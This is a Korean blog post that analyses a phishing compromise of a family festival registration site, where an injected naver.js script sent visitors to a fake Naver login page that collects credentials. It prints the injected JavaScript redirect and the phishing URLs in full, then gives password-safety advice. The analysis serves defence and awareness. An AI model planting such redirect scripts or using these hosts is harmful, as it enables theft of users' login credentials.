본문 바로가기
모의해킹 (WAPT)

네이버 로그인 정보 탈취 피싱사이트

by 날으는물고기 2015. 8. 20.

네이버 로그인 정보 탈취 피싱사이트

728x90

여름 끝자락, 가족물총축제로 시원하게!

http://mediahub.seoul.go.kr/archives/903363


위 사이트에 게재된 뉴스 기사를 통해 아래 내용을 접하고


기사내용 일부:

참가 접수는 물총축제 홈페이지(water.ibabynews.com)에서 진행하며, 신청한 가족 중 추첨을 통해 500가족을 선발합니다.


해당 내용에 따라 참가 접수를 위해 홈페이지 방문을 했는데 아래와 같이 네이버 로그인 창이 떳다.



이는 그냥 봐도 의심 안할 수가 없는 상황이다. ㅋ

네이버 로그인을 붙일 수는 없을것 같은데 설마해서 아이디/비밀번호를 엉터리로 입력해서 로그인 해봤다.

결국 에러창이 떳고 세부내용 확인 결과 네이버 로그인 정보 탈취하는 피싱사이트 감염된 상태였다.



문제가 되는 naver.js 파일이 로딩되고 있었다.


http://www.kwanginsa.com/cd/naver.js

if(document.cookie.indexOf("do_naver=")==-1)

{


var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="do_naver=Yes;path=/;expires="+expires.toGMTString();

var ref = document.referrer;

location.href="http://www.koreaconst.co.kr/file_upload/login.php";


}


이는 네이버 로그인 정보 탈취 피싱사이트로 이동시키고 있었다.


http://www.koreaconst.co.kr/file_upload/login.php


네이버 아이디 비밀번호를 입력하면 해커에게 고스란히 전달될 것이다.



피싱사이트 URL로 네이버 툴바가 설치된 상태에서 접속을 해보면 차단을 해준다.

하지만, 위 사이트처럼 프레임 내부에서 이동될 경우에는 안타깝게도 차단되지 않는다.


http://www.koreaconst.co.kr/file_upload/login.php


해당 피싱사이트에 접속해보면 아래와 같이 네이버와 유사한 로그인 창이 나타나게 되고

일반적인 사용자는 의심없이 네이버 아이디와 비밀번호를 입력할 것이다.



본인이 직접 네이버 사이트로 접속을 한 경우가 아니라면

네이버 아이디와 비밀번호를 요구할 경우 반드시 의심을 해보고

의심스럽다 생각될 경우 아이디와 비밀번호를 엉터리로 입력해서

정상적으로 네이버 로그인 에러 화면이 나오는지 반드시 확인되어야 할 것이다.


그리고 사이트 비밀번호는 반드시 사이트 마다 서로다른 비밀번호를 사용해야 하며

비밀번호는 주기적으로 변경을 통해 꾸준한 관리가 반드시 필요하다.

비밀번호 변경시에는 이전 사용한 비밀번호 사용을 재사용 하지 않아야 한다.

728x90
그리드형

댓글